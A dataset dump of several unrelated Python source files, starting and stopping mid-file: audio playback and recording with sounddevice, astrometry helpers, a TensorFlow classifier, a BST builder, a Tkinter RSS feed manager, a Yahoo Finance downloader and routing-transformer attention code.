stored.\n frames: int\n The number of frames to be stored. This should be the\n sames as len(outdata)\n \"\"\"\n if status:\n LOG.debug(\"SoundDevicePlayer: status = %s\", status)\n\n position = self._position\n reverse = self.reverse\n\n if position is None:\n LOG.debug(\"play block: no position\")\n wave_frames = 0\n else:\n # obtain the relevant sound data\n samplerate = self.samplerate\n duration = frames / samplerate\n if not reverse:\n start = position\n end = min(position+duration, self.end)\n else:\n start = max(self.start, position-duration)\n end = position\n wave = self._sound[start:end:samplerate]\n wave_frames = len(wave)\n\n # provide the wave to the OutputStream via the outdata array.\n valid_frames = min(wave_frames, frames)\n if not reverse:\n outdata[:valid_frames, :] = wave[:valid_frames]\n else:\n outdata[:valid_frames, :] = wave[valid_frames-1::-1]\n LOG.debug(\"block, position=%f:.2, reverse=%s; \"\n \"start=%f:.2, end=%f:.2, duration=%f:.4/%f:.4, \"\n \"frames=%d/%d\", position, reverse,\n start, end, duration, end-start,\n wave_frames, valid_frames)\n\n # pad missing data with zeros\n if wave_frames < frames:\n outdata[wave_frames:, :].fill(0)\n\n # If we have not obtained any data (wave_frames == 0) we will stop\n # playback here.\n if not reverse:\n new_position = end if wave_frames > 0 else None\n if new_position is not None and new_position >= self.end:\n new_position = self.start if self.loop else None\n else:\n new_position = start if wave_frames > 0 else None\n if new_position is not None and new_position <= self.start:\n new_position = self.end if self.loop else None\n # We have to avoid overwriting a change of position\n # that may have occured in the meantime (by some other thread)\n with self._lock:\n if self._position == position:\n super()._set_position(new_position)\n\n if new_position is None:\n # We cannot call _stream.stop() (or _stream.abort()) from\n # within the sub-thread (also not from finished_callback)\n # this will cause some error in the underlying C library).\n # The official way to stop the thread from within is to\n # raise an exception:\n raise sd.CallbackStop()\n\n def _finished(self) -> None:\n \"\"\"The finished_callback is called once the playback thread\n finishes (either due to an exception in the inner loop or by\n an explicit call to stream.stop() from the outside).\n \"\"\"\n # When the finihed_callback is called, the stream may not have\n # stopped yet - so when informing the observers, the playing\n # property may still report playing - to avoid this, we have\n # introduced the _finishing flag, that indicates that playback\n # has finished.\n self._event.set()\n if self.playing:\n self._finishing = True\n self.change('state_changed')\n\n def _stop(self) -> None:\n \"\"\"Stop an ungoing playback.\n \"\"\"\n # Here we could either call stream.stop() or stream.abort().\n # The first would stop acquiring new data, but finish processing\n # buffered data, while the second would abort immediately.\n # For the sake of a responsive interface, we choose abort here.\n if self._stream.active:\n self._stream.abort(ignore_errors=True)\n\n\nclass SoundRecorder(SoundRecorderBase):\n \"\"\"A :py:class:`SoundRecorder` based on the Python sounddevice\n library.\n \"\"\"\n\n def __init__(self, channels: int = None, samplerate: float = None,\n device: Union[int, str] = None, **kwargs):\n super().__init__(**kwargs)\n\n if channels is None:\n channels = 2 if self._sound is None else self._sound.channels\n if samplerate is None:\n samplerate = (44100 if self._sound is None else\n self._sound.samplerate)\n # device: input device (numeric ID or substring)\n # device_info = sd.query_devices(device, 'input')\n # samplerate = device_info['default_samplerate']\n\n self._stream = sd.InputStream(device=device, channels=channels,\n samplerate=samplerate,\n callback=self._record_block,\n finished_callback=self._finished)\n\n @property\n def samplerate(self) -> float:\n \"\"\"Samplerate used for recording.\n \"\"\"\n return self._stream.samplerate\n\n @property\n def channels(self) -> int:\n \"\"\"Number of channels to be recorded.\n \"\"\"\n return self._stream.channels\n\n @property\n def recording(self) -> bool:\n return self._stream.active\n\n def _record(self) -> None:\n \"\"\"\n \"\"\"\n LOG.info(\"Recorder: samplerate=%f\", self.samplerate)\n LOG.info(\"Recorder: sound=%s\", self.sound)\n\n LOG.info(\"Recorder: starting stream\")\n self._stream.start()\n LOG.info(\"Recorder: stream started\")\n\n def _FIXME_old_record(self) -> None:\n # This implementation assumes a plotter (like the\n # MatplotlibSoundPlotter), that has to start its own Thread\n # (as the matplotlib.animation.FuncAnimation class does).\n # The context manager (with self._stream) will start\n # the sounddevice.InputStream in its own Thread, and then\n # execute the inner block.\n #\n # # the context manager will start the stream task\n # with self._stream:\n # # this will start the plotter and block until the\n # # plotter has finished - hence we have to explicitly\n # # stop the plotter, once the stream has finished.\n # self._plotter.start_plot()\n\n # stream = sd.InputStream(device=device, channels=channels,\n # samplerate=samplerate, callback=audio_callback)\n # ani = FuncAnimation(fig, update_plot, interval=interval, blit=True)\n # with stream:\n # plt.show()\n pass\n\n def _record_block(self, indata, _frames, _time, status):\n \"\"\"This is called (from a separate thread) for each audio block.\"\"\"\n if status:\n LOG.debug(\"SoundDeviceRecorder: %s\", status)\n\n # append new data to the sound object\n self._sound += indata\n\n def _finished(self) -> None:\n LOG.info(\"SoundDeviceRecorder: finished\")\n\n def _stop(self) -> None:\n \"\"\"Stop ongoing sound recording.\n \"\"\"\n # Here we could either call stream.stop() or stream.abort().\n # The first would stop acquiring new data, but finish processing\n # buffered data, while the second would abort immediately.\n # In order to not loose any data, we choose stop here.\n LOG.info(\"SoundDeviceRecorder: aborting stream\")\n # self._stream.abort()\n if self._stream.active:\n self._stream.stop()\n LOG.info(\"SoundDeviceRecorder: stream aborted\")\n","sub_path":"dltb/thirdparty/sounddevice.py","file_name":"sounddevice.py","file_ext":"py","file_size_in_byte":13443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"483998586","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/max/Workspaces/gsfc/photometry_pipeline/code/reduction/astrom/astrometrystats.py\n# Compiled at: 2016-11-15 15:22:29\nimport numpy\n\ndef median(l):\n a = numpy.array(l)\n return numpy.median(a)\n\n\ndef stdev(l):\n a = numpy.array(l)\n return numpy.std(a)\n\n\ndef most(list, vmin=1, vmax=1):\n counter = numpy.zeros(len(list))\n for i in range(0, len(list)):\n counter[i] = ((list[i] + vmax >= list) & (list[i] - vmin <= list)).sum()\n\n if len(set(counter)) == 1:\n return numpy.median(list)\n else:\n return list[counter.argmax()]\n\n\ndef rasex2deg(rastr):\n rastr = str(rastr).strip()\n ra = rastr.split(':')\n if len(ra) == 1:\n return float(rastr)\n return 15 * (float(ra[0]) + float(ra[1]) / 60.0 + float(ra[2]) / 3600.0)\n\n\ndef decsex2deg(decstr):\n decstr = str(decstr).strip()\n dec = decstr.split(':')\n if len(dec) == 1:\n return float(decstr)\n sign = 1\n if decstr[0] == '-':\n sign = -1\n return sign * (abs(float(dec[0])) + float(dec[1]) / 60.0 + float(dec[2]) / 3600.0)\n\n\ndef magcomp(obj1, obj2):\n return (obj1.mag > obj2.mag) - (obj1.mag < obj2.mag)\n\n\ndef unique(inlist):\n lis = inlist[:]\n lis.sort()\n llen = len(lis)\n i = 0\n while i < llen - 1:\n if lis[(i + 1)] == lis[i]:\n del lis[i + 1]\n llen = llen - 1\n else:\n i = i + 1\n\n return lis","sub_path":"pycfiles/photopipe-0.1.0b4.tar/astrometrystats.py","file_name":"astrometrystats.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"344651012","text":"##\n## Seven layer fully connected CNN\n##\n\nimport tensorflow as tf\n\n\nclass Model(object):\n\tdef __init__(self, X, y):\n\t\t'''\n\t\tSetup graph using class. \n\t\tX = input tensor\n\t\ty = output tensor\n\t\t'''\n\n\t\t## Some hyper paramters\n\t\tself.learning_rate = 1e-2\n\t\tself.minibatch_size = 128\n\t\tself.num_epochs = 200\n\t\tself.evaluation_frequency = 1000\n\n\t\tfc1 = tf.layers.dense(inputs = X, units = 128, activation = 'sigmoid', name = 'fc_1')\n\t\tfc2 = tf.layers.dense(inputs = fc1, units = 64, activation = 'sigmoid', name = 'fc_2')\n\t\tfc3 = tf.layers.dense(inputs = fc2, units = 64, activation = 'sigmoid', name = 'fc_3')\n\t\tfc4 = tf.layers.dense(inputs = fc3, units = 32, activation = 'sigmoid', name = 'fc_4')\n\t\tfc5 = tf.layers.dense(inputs = fc4, units = 32, activation = 'sigmoid', name = 'fc_5')\n\t\tfc6 = tf.layers.dense(inputs = fc5, units = 16, activation = 'sigmoid', name = 'fc_6')\n\t\tlogits = tf.layers.dense(inputs = fc6, units = 10, activation = None, name = 'fc_7')\n\t\tself.yhat = tf.nn.softmax(logits)\n\n\t\t# Cost Function\n\t\tself.cost = tf.losses.softmax_cross_entropy(y, logits)\n\n\t\t# As we train, it will also be nice to keep track of the accuracy of our classifier\n\t\tcorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(self.yhat, 1)) # Check if predictions are equal to labels\n\t\tself.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) # Compute average accuracy\n\n\t\t# Add Optimizer to Graph:\n\t\toptimizer = tf.train.AdamOptimizer(learning_rate = self.learning_rate)\n\t\tself.train_op = optimizer.minimize(self.cost)\n\n\t\t#Setup Summary Writing for Tensorboard:\n\t\ttf.summary.scalar(name = 'cost', tensor = self.cost)\n\t\ttf.summary.scalar(name = 'accuracy', tensor = self.accuracy)\n\t\tself.merged_summary_op = tf.summary.merge_all() #Merges all summaries, in this case we only have one!\n\n\n\n","sub_path":"models/seven_layer_cross_entropy/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"24679157","text":"from bst import BST\nimport random\n\nclass BSTmaker():\n def make_random_bst(self, n=10, low_key=1, high_key=100):\n \"\"\"\n Create a BST with n distinct nodes. Each node has a random number wiht range\n [low_key, high_key)\n\n return nums, bst\n \"\"\"\n t = BST()\n nums = random.sample(range(low_key, high_key), n)\n for v in nums:\n t.insert(v)\n return nums, t\n\n def make_bst(self, nums):\n \"\"\"Create a bst with a given list of numbers\"\"\"\n t = BST()\n for v in nums:\n t.insert(v)\n return nums, t\n\n\nif __name__ == \"__main__\":\n nums, bst = BSTmaker().make_random_bst()\n print(nums)\n print(bst)\n\n# [76, 2, 47, 20, 10, 69, 29, 68, 15, 12]\n# ...76...\n# / \\\n# ..2..\n# / \\\n# ..47.\n# / \\\n# 20. 69\n# / \\ /\\\n# 10 29 68\n# / \\ /\\ /\\\n# 15\n# /\\\n# 12\n# /\\\n","sub_path":"chp4_tree_and_graph/bst_maker.py","file_name":"bst_maker.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"374994442","text":"#!/usr/bin/env python3.4\n\nfrom tkinter import *\nfrom tkinter import messagebox as msg\nfrom databaseManager import *\nfrom FeedReader import *\nimport webbrowser\n\nclass addRemove(Tk):\n\tdef __init__(self):\n\t\tTk.__init__(self)\n\t\tself.title(\"Manage Feeds\")\n\t\tself.font = (\"Arial\", \"16\")\n\t\tself.mainscreen = Mainscreen(self)\n\t\tself.mainscreen.grid()\n\t\tself.db = DatabaseManager()\n\n\tdef addFeedScreen(self):\n\t\tself.mainscreen.destroy()\n\t\tself.addScreen = AddFeedScreen(self)\n\t\tself.addScreen.grid()\n\n\tdef removeFeedScreen(self):\n\t\tself.mainscreen.destroy()\n\t\tself.removeScreen = RemoveFeedScreen(self, self.db)\n\t\tself.removeScreen.grid()\n\n\tdef addFeedToDatabase(self):\n\t\tfeedTitle = str(self.addScreen.titleEntry.get())\n\t\tfeedUrl = str(self.addScreen.urlEntry.get())\n\t\tself.db.addFeed(feedTitle, feedUrl)\n\t\tmsg.showinfo(\"Success!\", \"Feed added!\")\n\t\tself.addScreen.destroy()\n\t\tself.mainscreen = Mainscreen(self)\n\t\tself.mainscreen.grid()\n\n\tdef removeFeedFromDatabase(self):\n\t\tfeedTitle = str(self.removeScreen.feedName.get())\n\t\tself.db.removeFeed(feedTitle)\n\t\tmsg.showinfo(\"Success!\", \"Feed removed!\")\n\t\tself.removeScreen.destroy()\n\t\tself.mainscreen = Mainscreen(self)\n\t\tself.mainscreen.grid()\n\n\tdef iterateFeeds(self):\n\t\tself.db.closeConnection()\n\t\tfeedReader = FeedReader()\n\t\tfeedReader.iterateFeeds()\n\n\tdef openFeeds(self):\n\t\tself.iterateFeeds()\n\t\twebbrowser.open_new_tab(\"feeds.html\")\n\t\tself.destroy()\n\n\tdef quitApp(self):\n\t\tself.iterateFeeds()\n\t\tself.destroy()\n\nclass Mainscreen(Frame):\n\tdef __init__(self, parent):\n\t\tFrame.__init__(self, parent)\n\n\t\taddFeed = Button(self, text = \"Add Feed\", command = parent.addFeedScreen, width = \"10\")\n\t\taddFeed.grid(row = 0, column = 0)\n\n\t\tremoveFeed = Button(self, text = \"Remove Feed\", command = parent.removeFeedScreen, width = \"10\")\n\t\tremoveFeed.grid(row = 1, column = 0)\n\n\t\topenFeeds = Button(self, text = \"Open Feeds\", command = parent.openFeeds, width = \"10\")\n\t\topenFeeds.grid(row = 2, column = 0)\n\n\t\tquitApp = Button(self, text = \"Quit\", command = parent.quitApp, width = \"10\")\n\t\tquitApp.grid(row = 3, column = 0)\n\nclass AddFeedScreen(Frame):\n\tdef __init__(self, parent):\n\t\tFrame.__init__(self, parent)\n\n\t\tLabel(self, text = \"Feed title:\").grid(row = 0, column = 0, pady = 5, padx = 5)\n\n\t\tself.titleEntry = Entry(self)\n\t\tself.titleEntry.grid(row = 0, column = 1)\n\n\t\tLabel(self, text = \"Feed URL:\").grid(row = 1, column = 0, pady = 5, padx = 5)\n\n\t\tself.urlEntry = Entry(self)\n\t\tself.urlEntry.grid(row = 1, column = 1, pady = 5, padx = 5)\n\n\t\tsubmit = Button(self, text = \"Submit\", command = parent.addFeedToDatabase)\n\t\tsubmit.grid(row = 2, column = 0, columnspan = 2)\n\nclass RemoveFeedScreen(Frame):\n\tdef __init__(self, parent, db):\n\t\tFrame.__init__(self, parent)\n\t\tself.db = parent.db\n\t\tself.db = db.returnFeedArray()\n\n\t\tLabel(self, text = \"Remove Feed\").grid(row = 0, column = 0, columnspan = 2, pady = 5, padx = 5)\n\n\t\tsubmit = Button(self, text = \"Submit\", command = parent.removeFeedFromDatabase)\n\t\tsubmit.grid(row = 1, column = 0, columnspan = 2)\n\n\t\tself.feedName = StringVar()\n\t\tfeedlist = []\n\t\tfor index, feedEntry in enumerate(self.db):\n\t\t\tfeedlist.append(Radiobutton(self, text = feedEntry[0], variable = self.feedName, value = feedEntry[0]))\n\t\t\tfeedlist[index].grid(row = index + 2)\n\ndef main():\n gui = addRemove()\n gui.mainloop()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"RSS Reader/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"152705395","text":"import pandas_datareader as pdr\nimport pandas as pd\nfrom datetime import datetime\n\ndef pull_data(symbol):\n try:\n data = pdr.get_data_yahoo(symbols=symbol, start=datetime(2015, 1, 1), end=datetime(2019, 1, 1))\n if len(data) >= 800:\n data.to_csv(\"{}.csv\".format(symbol))\n else:\n print(\"Incomplete data for {}\".format(symbol))\n except: print(\"Could not load {}\".format(symbol))\n\ndef loadSP500():\n data = pd.read_excel(\"S&P500.xlsx\")\n return data['Ticker']\n\nstocks = loadSP500()\nfor i in stocks:\n pull_data(i)","sub_path":"data/yahoo-finance-script.py","file_name":"yahoo-finance-script.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"156537539","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math\nfrom inspect import isfunction\nfrom operator import mul\nfrom functools import partial, reduce, wraps\n\nfrom axial_positional_embedding import AxialPositionalEmbedding\nfrom product_key_memory import PKM\nfrom routing_transformer.reversible import ReversibleSequence, SequentialSequence\n\n# constants\n\nTOKEN_SELF_ATTN_VALUE = -5e4\nKMEAN_INIT_ITERS = 10\n\n# helper functions\n\ndef identity(x, *args, **kwargs):\n return x\n\ndef default(x, d):\n if x is None:\n return d if not isfunction(d) else d()\n return x\n\ndef cast_tuple(x):\n return x if isinstance(x, tuple) else (x,)\n\ndef cache_fn(f):\n cache = None\n @wraps(f)\n def cached_fn(*args, **kwargs):\n nonlocal cache\n if cache is not None:\n return cache\n cache = f(*args, **kwargs)\n return cache\n return cached_fn\n\ndef to(t):\n return {'device': t.device, 'dtype': t.dtype}\n\ndef find_modules(nn_module, type):\n return [module for module in nn_module.modules() if isinstance(module, type)]\n\ndef is_empty(t):\n return t.nelement() == 0\n\ndef max_neg_value(tensor):\n return -torch.finfo(tensor.dtype).max\n\ndef batched_index_select(values, indices):\n last_dim = values.shape[-1]\n return values.gather(2, expand_dim(indices, -1, last_dim))\n\ndef merge_dims(ind_from, ind_to, tensor):\n shape = list(tensor.shape)\n arr_slice = slice(ind_from, ind_to + 1)\n shape[arr_slice] = [reduce(mul, shape[arr_slice])]\n return tensor.reshape(*shape)\n\ndef expand_dim(t, dim, k):\n t = t.unsqueeze(dim)\n expand_shape = [-1] * len(t.shape)\n expand_shape[dim] = k\n return t.expand(*expand_shape)\n\ndef scatter_mean(src, t, index, dim, eps = 1e-5):\n numer = src.scatter_add(dim, index, t)\n denom = src.scatter_add(dim, index, torch.ones_like(t))\n return numer / (denom + eps)\n\ndef look_around(x, backward = 1, forward = 0, pad_value = -1, dim = 2):\n t = x.shape[1]\n dims = (len(x.shape) - dim) * (0, 0)\n padded_x = F.pad(x, (*dims, backward, forward), value= pad_value)\n tensors = [padded_x[:, ind:(ind + t), ...] for ind in range(forward + backward + 1)]\n return torch.cat(tensors, dim=dim)\n\ndef split_at_index(dim, index, t):\n pre_slices = (slice(None),) * dim\n l = (*pre_slices, slice(None, index))\n r = (*pre_slices, slice(index, None))\n return t[l], t[r]\n\ndef ema(old, new, decay):\n if old is None:\n return new\n return old * decay + new * (1 - decay)\n\ndef ema_inplace(moving_avg, new, decay):\n if is_empty(moving_avg):\n moving_avg.data.copy_(new)\n return\n moving_avg.data.mul_(decay).add_(new, alpha= (1 - decay))\n\n# helper classes\n\nclass Chunk(nn.Module):\n def __init__(self, chunks, fn, along_dim = -1):\n super().__init__()\n self.dim = along_dim\n self.chunks = chunks\n self.fn = fn\n\n def forward(self, x, **kwargs):\n if self.chunks <= 1:\n return self.fn(x, **kwargs)\n chunks = x.chunk(self.chunks, dim = self.dim)\n return torch.cat([self.fn(c, **kwargs) for c in chunks], dim = self.dim)\n\nclass PreNorm(nn.ModuleList):\n def __init__(self, dim, fn):\n super().__init__()\n self.norm = nn.LayerNorm(dim)\n self.fn = fn\n def forward(self, x, **kwargs):\n x = self.norm(x)\n return self.fn(x, **kwargs)\n\nclass ProjectInOut(nn.Module):\n def __init__(self, fn, dim_in, dim_out, project_out = True):\n super().__init__()\n self.fn = fn\n self.project_in = nn.Linear(dim_in, dim_out)\n self.project_out = nn.Linear(dim_out, dim_in) if project_out else identity\n\n def forward(self, x, **kwargs):\n x = self.project_in(x)\n x, loss = self.fn(x, **kwargs)\n x = self.project_out(x)\n return x, loss\n\n# positional embeddings\n\nclass AbsolutePositionalEmbedding(nn.Module):\n def __init__(self, dim, max_seq_len):\n super().__init__()\n self.emb = nn.Embedding(max_seq_len, dim)\n\n def forward(self, x):\n t = torch.arange(x.shape[1], device=x.device)\n return self.emb(t)\n\ndef shift(x):\n *_, i, j = x.shape\n zero_pad = torch.zeros((*_, i, i), **to(x))\n x = torch.cat([x, zero_pad], -1)\n l = i + j - 1\n x = x.view(*_, -1)\n zero_pad = torch.zeros(*_, -x.size(-1) % l, **to(x))\n shifted = torch.cat([x, zero_pad], -1).view(*_, -1, l)\n return shifted[..., :i, i - 1:]\n\nclass RelativePositionalEmbedding(nn.Module):\n def __init__(self, dim, heads, length):\n super().__init__()\n self.scale = dim ** -0.5\n self.weights = nn.Parameter(torch.zeros(length, heads, dim))\n\n def forward(self, q):\n emb = torch.einsum('bhnid,jhd->bhnij', q, self.weights.type(q.dtype)) * self.scale\n return shift(emb)\n\n# local attention\n\nclass LocalAttention(nn.Module):\n def __init__(self, bucket_size, heads, head_dim, causal = False, look_backward = 1, look_forward = None, dropout = 0., shared_qk = False, rel_pos_emb = True):\n super().__init__()\n self.look_forward = default(look_forward, 0 if causal else 1)\n assert not (causal and self.look_forward > 0), 'you cannot look forward if causal'\n\n self.bucket_size = bucket_size\n self.causal = causal\n self.look_backward = look_backward\n self.shared_qk = shared_qk\n\n self.heads = heads\n self.dropout = nn.Dropout(dropout)\n\n self.rel_pos = RelativePositionalEmbedding(head_dim, heads, bucket_size * 2) if rel_pos_emb else None\n\n def forward(self, q, k, v, input_mask = None):\n shape = q.shape\n\n merge_into_batch = lambda t: t.reshape(-1, *t.shape[-2:])\n q, k, v = map(merge_into_batch, (q, k, v))\n\n b, t, e, h, device, dtype = *q.shape, self.heads, q.device, q.dtype\n bucket_size, causal, look_backward, look_forward, shared_qk = self.bucket_size, self.causal, self.look_backward, self.look_forward, self.shared_qk\n\n buckets = t // bucket_size\n\n if shared_qk:\n k = F.normalize(k, 2, dim=-1).type(q.type())\n\n ticker = torch.arange(t, device=device, dtype=dtype)[None, :]\n b_t = ticker.reshape(1, buckets, bucket_size)\n\n bucket_fn = lambda t: t.reshape(b, buckets, bucket_size, -1)\n bq, bk, bv = map(bucket_fn, (q, k, v))\n\n look_around_kwargs = {'backward': look_backward, 'forward': look_forward}\n bk = look_around(bk, **look_around_kwargs)\n bv = look_around(bv, **look_around_kwargs)\n\n bq_t = b_t\n bq_k = look_around(b_t, **look_around_kwargs)\n\n dots = torch.einsum('bhie,bhje->bhij', bq, bk) * (e ** -0.5)\n\n if self.rel_pos is not None:\n rel_attn = self.rel_pos(bq.view(-1, h, *bq.shape[1:])).reshape_as(dots)\n dots = dots + rel_attn\n\n mask_value = max_neg_value(dots)\n\n if shared_qk:\n mask = bq_t[:, :, :, None] == bq_k[:, :, None, :]\n dots.masked_fill_(mask, TOKEN_SELF_ATTN_VALUE)\n del mask\n\n if causal:\n mask = bq_t[:, :, :, None] < bq_k[:, :, None, :]\n dots.masked_fill_(mask, mask_value)\n del mask\n\n mask = bq_k[:, :, None, :] == -1\n dots.masked_fill_(mask, mask_value)\n del mask\n\n if input_mask is not None:\n h = b // input_mask.shape[0]\n input_mask = input_mask.reshape(-1, buckets, bucket_size)\n mq = mk = input_mask\n mk = look_around(mk, pad_value=False, **look_around_kwargs)\n mask = (mq[:, :, :, None] * mk[:, :, None, :])\n mask = merge_dims(0, 1, expand_dim(mask, 1, h))\n dots.masked_fill_(~mask, mask_value)\n del mask\n\n attn = dots.softmax(dim=-1)\n attn = self.dropout(attn)\n\n out = torch.einsum('bhij,bhje->bhie', attn, bv)\n out = out.reshape(*shape)\n return out\n\n# kmeans related function and class\n\ndef update_kmeans_on_backwards(module):\n module.kmean_modules = find_modules(module, Kmeans)\n def hook(_, grad_in, grad_out):\n for m in module.kmean_modules:\n m.update()\n\n return module.register_backward_hook(hook)\n\ndef similarity(x, means):\n return torch.einsum('bhld,hcd->bhlc', x, means)\n\ndef dists_and_buckets(x, means):\n dists = similarity(x, means)\n _, buckets = torch.max(dists, dim=-1)\n return dists, buckets\n\ndef batched_bincount(index, num_classes, dim=-1):\n shape = list(index.shape)\n shape[dim] = num_classes\n out = index.new_zeros(shape)\n out.scatter_add_(dim, index, torch.ones_like(index, dtype=index.dtype))\n return out\n\ndef kmeans_iter(x, means, buckets = None):\n b, h, l, d, dtype, num_clusters = *x.shape, x.dtype, means.shape[1]\n\n if buckets is None:\n _, buckets = dists_and_buckets(x, means)\n\n bins = batched_bincount(buckets, num_clusters).sum(0, keepdim=True)\n zero_mask = bins.long() == 0\n\n means_ = buckets.new_zeros(b, h, num_clusters, d, dtype=dtype)\n means_.scatter_add_(-2, expand_dim(buckets, -1, d), x)\n means_ = F.normalize(means_.sum(0, keepdim=True), dim=-1).type(dtype)\n\n means = torch.where(zero_mask.unsqueeze(-1), means, means_)\n means = means.squeeze(0)\n return means\n\ndef distribution(dists, window_size):\n _, topk_indices = dists.topk(k=window_size, dim=-2)\n indices = topk_indices.transpose(-2, -1)\n return indices.reshape(*indices.size()[:2], -1)\n\nclass Kmeans(nn.Module):\n def __init__(self, num_heads, head_dim, num_clusters, ema_decay = 0.999, commitment = 1e-4):\n super().__init__()\n self.commitment = commitment\n self.ema_decay = ema_decay\n\n self.register_buffer('means', torch.randn(num_heads, num_clusters, head_dim))\n self.register_buffer('initted', torch.tensor(False))\n self.num_new_means = 0\n self.new_means = None\n\n @torch.no_grad()\n def init(self, x):\n if self.initted:\n return\n _, h, _, d, device, dtype = *x.shape, x.device, x.dtype\n\n num_clusters = self.means.shape[1]\n\n means = x.transpose(0, 1).contiguous().view(h, -1, d)\n num_samples = means.shape[1]\n\n if num_samples >= num_clusters:\n indices = torch.randperm(num_samples, device=device)[:num_clusters]\n else:\n indices = torch.randint(0, num_samples, (num_clusters,), device=device)\n\n means = means[:, indices]\n\n for _ in range(KMEAN_INIT_ITERS):\n means = kmeans_iter(x, means)\n\n self.num_new_means = 0\n self.means.data.copy_(means)\n self.initted.data.copy_(torch.tensor(True))\n\n @torch.no_grad()\n def update(self, new_means = None):\n new_means = default(new_means, self.new_means)\n assert new_means is not None, 'new kmeans has not been supplied'\n ema_inplace(self.means, new_means, self.ema_decay)\n\n del self.new_means\n self.new_means = None\n self.num_new_means = 0\n\n def forward(self, x, update_means = False):\n self.init(x)\n\n b, dtype = x.shape[0], x.dtype\n means = self.means.type(dtype)\n x = F.normalize(x, 2, dim=-1).type(dtype)\n\n with torch.no_grad():\n dists, buckets = dists_and_buckets(x, means)\n\n routed_means = batched_index_select(expand_dim(means, 0, b), buckets)\n loss = F.mse_loss(x, routed_means) * self.commitment\n\n if update_means:\n with torch.no_grad():\n means = kmeans_iter(x, means, buckets)\n self.new_means = ema(self.new_means, means, self.num_new_means / (self.num_new_means + 1))\n self.num_new_means += 1\n\n return dists, loss\n\n# kmeans attention class\n\nclass KmeansAttention(nn.Module):\n def __init__(self, num_clusters, window_size, num_heads, head_dim, causal = False, dropout = 0., ema_decay = 0.999, commitment = 1e-4, context_window_size = None, receives_context = False, num_mem_kv = 0, shared_qk = False):\n super().__init__()\n self.num_heads = num_heads\n self.num_clusters = num_clusters\n self.head_dim = head_dim\n\n self.window_size = window_size\n self.context_window_size = default(context_window_size, window_size)\n self.causal = causal\n\n self.shared_qk = shared_qk\n self.receives_context = receives_context\n self.kmeans = Kmeans(num_heads, head_dim, num_clusters, ema_decay, commitment)\n self.dropout = nn.Dropout(dropout)\n\n self.num_mem_kv = max(num_mem_kv, 1 if causal and not shared_qk else 0)\n self.mem_key = nn.Parameter(torch.randn(num_heads, num_clusters, self.num_mem_kv, head_dim))\n self.mem_value = nn.Parameter(torch.randn(num_heads, num_clusters, self.num_mem_kv, head_dim))\n\n def forward(self, q, k, v, query_mask = None, key_mask = None, **kwargs):\n b, h, t, d, kv_t, wsz, c_wsz, nc, device, dtype = *q.shape, k.shape[2], self.window_size, self.context_window_size, self.num_clusters, q.device, q.dtype\n is_reverse = kwargs.pop('_reverse', False)\n\n out = torch.zeros_like(q, dtype=dtype)\n\n update_kmeans = self.training and not is_reverse\n \n key_mask = default(key_mask, query_mask) if not self.receives_context else key_mask\n kv_wsz = wsz if not self.receives_context else c_wsz\n\n wsz = min(wsz, t)\n kv_wsz = min(kv_wsz, kv_t)\n\n if not self.shared_qk or self.receives_context:\n dists, aux_loss = self.kmeans(torch.cat((q, k), dim=2), update_kmeans)\n q_dists, k_dists = split_at_index(2, t, dists)\n indices = distribution(q_dists, wsz)\n kv_indices = distribution(k_dists, kv_wsz)\n else:\n dists, aux_loss = self.kmeans(q, update_kmeans)\n k = F.normalize(k, dim=-1).to(q)\n indices = distribution(dists, wsz)\n kv_indices = indices\n\n q = batched_index_select(q, indices)\n k = batched_index_select(k, kv_indices)\n v = batched_index_select(v, kv_indices)\n\n reshape_with_window = lambda x: x.reshape(b, h, nc, -1, d)\n q, k, v = map(reshape_with_window, (q, k, v))\n\n m_k, m_v = map(lambda x: expand_dim(x, 0, b).to(q), (self.mem_key, self.mem_value))\n k, v = map(lambda x: torch.cat(x, dim=3), ((m_k, k), (m_v, v)))\n\n dots = torch.einsum('bhnid,bhnjd->bhnij', q, k) * (d ** -0.5)\n\n mask_value = max_neg_value(dots)\n\n if query_mask is not None or key_mask is not None:\n query_mask = default(query_mask, lambda: torch.ones((b, t), device=device).bool())\n key_mask = default(key_mask, lambda: torch.ones((b, kv_t), device=device).bool())\n\n q_mask = expand_dim(query_mask, 1, h).gather(2, indices)\n kv_mask = expand_dim(key_mask, 1, h).gather(2, kv_indices)\n q_mask, kv_mask = map(lambda t: t.reshape(b, h, nc, -1), (q_mask, kv_mask))\n mask = q_mask[:, :, :, :, None] * kv_mask[:, :, :, None, :]\n mask = F.pad(mask, (self.num_mem_kv, 0), value=True)\n dots.masked_fill_(~mask, mask_value)\n del mask\n\n if self.causal:\n q_mask, kv_mask = map(lambda t: t.reshape(b, h, nc, -1), (indices, kv_indices))\n mask = q_mask[:, :, :, :, None] >= kv_mask[:, :, :, None, :]\n mask = F.pad(mask, (self.num_mem_kv, 0), value=True)\n dots.masked_fill_(~mask, mask_value)\n del mask \n\n if self.shared_qk:\n q_mask, kv_mask = map(lambda t: t.reshape(b, h, nc, -1), (indices, kv_indices))\n mask = q_mask[:, :, :, :, None] == kv_mask[:, :, :, None, :]\n mask = F.pad(mask, (self.num_mem_kv, 0), value=False)\n dots.masked_fill_(mask, TOKEN_SELF_ATTN_VALUE)\n del mask\n\n dots = dots.softmax(dim=-1)\n dots = self.dropout(dots)\n\n bo = torch.einsum('bhcij,bhcjd->bhcid', dots, v)\n so = torch.reshape(bo, (b, h, -1, 